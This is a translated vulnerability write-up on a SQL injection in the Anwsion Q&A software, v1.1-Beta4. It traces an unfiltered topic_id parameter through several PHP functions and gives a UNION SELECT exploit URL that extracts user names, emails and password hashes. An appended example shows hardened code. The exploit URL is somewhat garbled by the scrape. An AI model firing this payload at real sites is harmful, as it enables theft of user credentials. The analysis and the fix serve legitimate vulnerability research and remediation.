Anwsion (v1.1-Beta4) Injection Vulnerability

Source: Internet
Author: User

By Rices (Forum: T00ls.net, Blog: Rices.so)

Jesus from 3hack is using this program and I promised to help look it over. For lack of time I only got around to reading the code last night, and the way it is written is a bit hard on me as a programmer, especially the handling and splitting of URL parameters, which reads like foreign code... painful! Still, compared with Typecho and TextCube, which I looked at earlier, this code is much easier to follow. OK, enough chatter, on to the code.

\app\home\main.php (line 85):

```php
public function explore_action()   // method name and template path reconstructed; the scrape garbled both
{
    // omitted ...
    if ($_GET['category'])
    {
        if (is_numeric($_GET['category']))   // said to have been injectable here earlier, hence the is_numeric() check
        {
            $category_info = $this->model('system')->get_category_info($_GET['category']);
        }
    }
    /* omitted ... */

    // start of the injection path
    if (TPL::is_output('block/content_question.tpl.htm', 'home/explore'))
    {
        if (!$_GET['sort_type'])
        {
            $_GET['sort_type'] = 'new';
        }
        if ($_GET['sort_type'] == 'unresponse')
        {
            $_GET['answer_count'] = '0';
        }

        // $_GET['topic_id'] is passed straight through, with no filtering at all
        $question_list = $this->model('question')->get_questions_list($_GET['page'], get_setting('contents_per_page'), $_GET['sort_type'], $_GET['topic_id'], $this->user_id, $category_info['id'], $_GET['answer_count'], $_GET['day']);

        TPL::assign('question_list', $question_list);
        TPL::assign('question_list_bit', TPL::output('question/ajax/list', false));
    }
    // omitted ...
}
```

Following $this->model('question')->get_questions_list into \models\question.php (line 63):

```php
public function get_questions_list($page = 1, $pre_page = 10, $sort = 'hot', $topic_id = 0, $uid = null, $category_id = null, $answer_count = null, $day = 30)
{
    $uid = intval($uid);
    $user_id_list = array();
    $user_info_list = array();
    $user_list = array();
    $question_info_list = array();
    $question_list = array();
    $limit = calc_page_limit($page, $pre_page);

    if ($sort == 'hot')
    {
        // $topic_id is carried along, still unfiltered
        $question_info_list = $this->get_hot_question($category_id, $topic_id, $limit, $day);
    }
    // omitted ...
}
```

Next, the get_hot_question function, \models\question.php (line 216):

```php
public function get_hot_question($category_id = 0, $topic_id = null, $limit = '0, 10', $day = 30)
{
    $day = intval($day);
    if (!$day)
    {
        $add_time = '0';
    }
    else if ($day == 1)
    {
        $add_time = strtotime('-1 Day');
    }
    else
    {
        $add_time = strtotime('-' . $day . ' Day');
    }

    if ($category_id)
    {
        $question_all = $this->fetch_all('question', "add_time > " . $add_time . " AND focus_count > 0 AND agree_count > 0 AND answer_count > 0 AND category_id IN (" . implode(',', $this->model('system')->get_category_with_child_ids('question', $category_id)) . ')');
    }
    else if ($topic_id)
    {
        $topic_ids = array();
        if (is_array($topic_id))
        {
            $topic_ids = $topic_id;
        }
        else
        {
            $topic_ids[] = $topic_id;
        }

        // handed to get_question_ids_by_topics_ids without any filtering
        if ($question_ids = $this->model('topic')->get_question_ids_by_topics_ids($topic_ids, 10, null, 'question_id DESC'))
        {
            $question_all = $this->fetch_all('question', "add_time > " . $add_time . " AND question_id IN (" . implode(',', $question_ids) . ')', 'popular_value DESC', $limit);
        }
    }
    else
    {
        $question_all = $this->fetch_all('question', 'add_time > ' . $add_time, 'popular_value DESC', $limit);
    }

    return $question_all;
}
```

Finally, the get_question_ids_by_topics_ids function, \models\topic.php (line 693):

```php
function get_question_ids_by_topics_ids($topic_ids, $limit, $where = null, $order = 'update_time DESC')
{
    if (!is_array($topic_ids))
    {
        $topic_id_in = $topic_ids;
    }
    else
    {
        $topic_id_in = implode(',', $topic_ids);
    }

    if ($where)
    {
        $where = ' AND ' . $where;
    }

    $_order = explode(' ', $order);
    if (!$where AND $_order[0] == 'question_id')
    {
        // the raw value is concatenated into the statement and executed directly: this is where the injection lands
        $result = $this->query_all("SELECT question_id FROM " . $this->get_table('topic_question') . " WHERE topic_id IN (" . $topic_id_in . ") ORDER BY " . $order, $limit);
    }
    else
    {
        // omitted ...
    }
}
```

So the chain is $_GET['topic_id'] -> get_questions_list -> get_hot_question -> get_question_ids_by_topics_ids, with no integer cast or escaping at any step; the only point where the value meets the database is the string-concatenated IN (...) clause, which is reached whenever sort_type is hot, no numeric category is given and a topic_id is supplied.

Let's throw out an exp first:

```
http://www.bkjia.com /? /Home/category E/category? Sort_type-hot _ answer_count-1 _ day-1 _ topic_id-55) % 20and % 201 = 2% 20 union % 20 select % 20 concat % 28 (select % 20 concat (user_name, 0x2D3E, email, 0x2D3E, password) % 20 from % 20aws_users % 20 limit % 29%) % 23
```
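As an added example (my own code, not Anwsion's or the author's), here is how the final query builder can be hardened: cast every topic id to an integer at the model boundary and restrict the ORDER BY clause to an allowlist. The function name, the unprefixed table name and the sample inputs are my own choices.

```php
<?php
// Added example, not Anwsion's own code: a hardened stand-in for the topic-id
// lookup in models/topic.php. Every id is cast to an integer before it reaches
// the SQL string and ORDER BY must match an allowlist, so a value shaped like
// "55) and 1=2 union select ..." can no longer alter the statement.
// The table is written without the site's "aws_" prefix for brevity.
function build_topic_question_sql($topic_ids, $order = 'update_time DESC')
{
    // Accept a single id or an array of ids, as the original function does.
    if (!is_array($topic_ids))
    {
        $topic_ids = array($topic_ids);
    }
    // intval() keeps only the leading digits ("55) and 1=2" becomes 55);
    // anything that was never a positive integer collapses to 0 and is dropped.
    $clean_ids = array();
    foreach ($topic_ids as $id)
    {
        $id = intval($id);
        if ($id > 0)
        {
            $clean_ids[$id] = $id;   // keyed by value to de-duplicate
        }
    }
    if (empty($clean_ids))
    {
        return null;   // nothing valid to look up; the caller treats this as "no questions"
    }
    // $order comes from calling code today, but an allowlist keeps it safe
    // if a future caller ever forwards a request parameter into it.
    $allowed = array('update_time DESC', 'update_time ASC', 'question_id DESC', 'question_id ASC');
    if (!in_array($order, $allowed, true))
    {
        $order = 'update_time DESC';
    }
    return 'SELECT question_id FROM topic_question WHERE topic_id IN ('
         . implode(',', $clean_ids) . ') ORDER BY ' . $order;
}

// Constructed inputs: an honest request, the shape of the value from the
// write-up, and a non-numeric id. The first two must yield the same statement.
$honest   = build_topic_question_sql(array('55'), 'question_id DESC');
$hostile  = build_topic_question_sql(array('55) and 1=2 union select 1#'), 'question_id DESC');
$nonsense = build_topic_question_sql(array('abc', '0'), 'question_id DESC');
echo $honest, "\n";
echo ($honest === $hostile ? 'injected suffix discarded' : 'BUG: queries differ'), "\n";
echo ($nonsense === null ? 'non-numeric ids rejected' : 'BUG: bad ids accepted'), "\n";
```

The same cast belongs at the controller as well, mirroring the is_numeric() check the author already found on the category parameter.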

I think for most people these programs are still black boxes, and the big names probably can't be bothered with them. There are other similar injections, which I won't go into. This program is really insecure and could be used as outside help! Over~
